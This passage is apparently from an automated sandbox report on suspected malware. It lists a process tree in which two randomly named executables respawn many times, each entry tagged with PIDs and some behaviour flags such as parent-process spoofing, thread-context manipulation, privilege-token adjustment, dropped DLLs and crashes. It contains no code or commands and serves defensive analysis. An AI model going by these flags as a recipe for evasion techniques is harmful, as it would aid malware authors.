        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:3048
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:6700
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8780
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6592
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9160
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4660
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:3620
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:8544
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7408
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6452
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9724
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6304
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4900
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7776
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9424
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9448
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11212
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6280
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8820
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:2248
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7924
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8688
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4792
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4088
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9692
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6312
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10608
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7988
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5352
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10128
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:576
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4776
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        Loads dropped DLL
        
        PID:3920
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10308
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4888
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6988
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:1720
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9676
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9696
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6856
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5724
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9636
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7284
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5308
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:2456
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4240
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10480
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11032
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5208
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:3980
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7100
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6136
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8644
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:1176
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7956
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11604
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6400
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:12932
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:12732
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13228
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13072
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:12928
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13024
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6928
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 36
        8⤵
        Program crash
        
        PID:13292
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:800
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5416
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:8628
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:4712
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10840
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10884
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9972
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13448
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14008
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13584
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14232
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13796
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14300
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13872
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13528
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:1180
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13520
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11772
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13848
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9752
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:7892
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:1576
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11464
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11440
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:10680
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 28
        8⤵
        Program crash
        
        PID:8628
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13280
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5044
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14288
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11108
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11108 -s 28
        8⤵
        Program crash
        
        PID:9548
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:12348
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14016
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:2852
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11908
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:11948
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:6068
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5612
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:9248
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14880
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:15328
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14876
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:14444
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:5896
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:15148
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:13940
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        
        C:\Users\Admin\Documents\SwCHiM1k_kk0mykkYJb5onl3.exe
        7⤵
        
        PID:12448
      - C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        "C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:8196
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6776
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:3352
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:1120
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9516
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9396
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:2568
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9596
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5940
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:3856
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8728
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:2884
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:1816
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9684
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9244
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8564
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10568
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11024
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        Loads dropped DLL
        
        PID:2624
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10328
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7240
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8888
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9520
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6916
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8440
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7996
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:2780
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:3100
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10180
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8820
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:4040
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5712
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
